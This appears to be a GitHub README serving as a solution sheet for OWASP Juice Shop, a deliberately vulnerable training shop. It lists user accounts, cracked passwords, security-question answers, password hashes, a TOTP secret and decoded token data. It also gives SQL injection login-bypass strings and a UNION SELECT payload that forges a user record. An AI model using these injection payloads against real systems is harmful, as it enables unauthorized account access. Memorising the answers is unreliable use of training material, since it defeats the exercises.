Skip to content

Latest commit

 

History

History
262 lines (200 loc) · 5.83 KB

README.md

File metadata and controls

262 lines (200 loc) · 5.83 KB

JuiceShop-UsersData

Users Data in Juice-Shop and Others;


admin@juice-sh.op

Password = admin123

{ "status": "success", "data": { "id": 1, "username": "", "email": "admin@juice-sh.op", "password": "0192023a7bbd73250516f069df18b500", "role": "admin", "deluxeToken": "", "lastLoginIp": "undefined", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-10-19 13:00:04.308 +00:00", "updatedAt": "2020-10-19 13:59:01.826 +00:00", "deletedAt": null }, "iat": 1603116006, "exp": 1603134006 }


mc.safesearch@juice-sh.op

Password = Mr. N00dles

{ "status": "success", "data": { "id": 8, "username": "", "email": "mc.safesearch@juice-sh.op", "password": "b03f4b0ba8b458fa0acdc02cdb953bc8", "role": "customer", "deluxeToken": "", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-11-29 12:22:43.104 +00:00", "updatedAt": "2020-11-29 12:22:43.104 +00:00", "deletedAt": null }, "iat": 1606655036, "exp": 1606673036 }


amy@juice-sh.op

Password = K1f.....................

{ "status": "success", "data": { "id": 11, "username": "", "email": "amy@juice-sh.op", "password": "030f05e45e30710c3ad3c32f00de0473", "role": "customer", "deluxeToken": "", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-12-05 10:51:02.978 +00:00", "updatedAt": "2020-12-05 10:51:02.978 +00:00", "deletedAt": null }, "iat": 1607165772, "exp": 1607183772 }


bjoern.kimminich@gmail.com

but you can use this email too => bjoern@owasp.org

Password = bW9jLmxpYW1nQGhjaW5pbW1pay5ucmVvamI=

Security answer = Zaya

bjoern@juice-sh.op

Security answer = West-2082

Zip = 25436 => West-2082

{ "status": "success", "data": { "id": 13, "username": "", "email": "bjoern@owasp.org", "password": "9283f1b2e9669749081963be0462e466", "role": "deluxe", "deluxeToken": "efe2f1599e2d93440d5243a1ffaf5a413b70cf3ac97156bd6fab9b5ddfcbe0e4", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/12.jpg", "totpSecret": "", "isActive": true, "createdAt": "2020-12-22 11:44:09.327 +00:00", "updatedAt": "2020-12-22 11:44:09.327 +00:00", "deletedAt": null }, "iat": 1608637987, "exp": 1608655987 }


jim@juice-sh.op

Password = ncc-1701

Security Questiob = Samuel

{ "status": "success", "data": { "id": 2, "username": "", "email": "jim@juice-sh.op", "password": "e541ca7ecf72b8d1286474fc613e5e45", "role": "customer", "deluxeToken": "", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-11-25 14:39:09.207 +00:00", "updatedAt": "2020-11-25 14:39:09.207 +00:00", "deletedAt": null }, "iat": 1606320235, "exp": 1606338235 }


bender@juice-sh.op

Password = Stop'n'Drop

You can use for enter = ' or 1=1 and email like('%bender%');--

{ "status": "success", "data": { "id": 3, "username": "", "email": "bender@juice-sh.op", "password": "0c36e517e3fa95aabf1bbffc6744a4ef", "role": "customer", "deluxeToken": "", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-11-25 14:39:09.207 +00:00", "updatedAt": "2020-11-25 14:39:09.207 +00:00", "deletedAt": null }, "iat": 1606321399, "exp": 1606339399 }


chris.pike@juice-sh.op

Enter for = chris.pike@juice-sh.op'--


uvogin@juice-sh.op

security answer = Silence of the Lambs

{ "status": "success", "data": { "id": 16, "username": "", "email": "uvogin@juice-sh.op", "password": "05f92148b4b60f7dacd04cceebb8f1af", "role": "customer", "deluxeToken": "", "lastLoginIp": "0.0.0.0", "profileImage": "assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-12-25 11:55:39.720 +00:00", "updatedAt": "2020-12-25 11:55:39.720 +00:00", "deletedAt": null }, "iat": 1608897572, "exp": 1608915572 }


morty@juice-sh.op

Security answer = Snowball => 5N0wb41L


acc0unt4nt@juice-sh.op

SQL ınjection is = ' UNION SELECT * FROM (SELECT 15 as 'id', '' as 'username', 'acc0unt4nt@juice-sh.op' as 'email', '12345' as 'password', 'accounting' as 'role', '123' as 'deluxeToken', '1.2.3.4' as 'lastLoginIp' , '/assets/public/images/uploads/default.svg' as 'profileImage', '' as 'totpSecret', 1 as 'isActive', '2020-08-16 14:14:41.644 +00:00' as 'createdAt', '2020-08-16 14:33:41.930 +00:00' as 'updatedAt', null as 'deletedAt')--

"data": { "id": 15, "username": "", "email": "acc0unt4nt@juice-sh.op", "password": "12345", "role": "accounting", "deluxeToken": "123", "lastLoginIp": "1.2.3.4", "profileImage": "/assets/public/images/uploads/default.svg", "totpSecret": "", "isActive": true, "createdAt": "2020-08-16 14:14:41.644 +00:00", "updatedAt": "2020-08-16 14:33:41.930 +00:00", "deletedAt": null }, "iat": 1610024731, "exp": 1610042731 }


wurstbrot@juice-sh.op

2FA Token = IFTXE3SPOEYVURT2MRYGI52TKJ4HC3KH => generate with authenticator.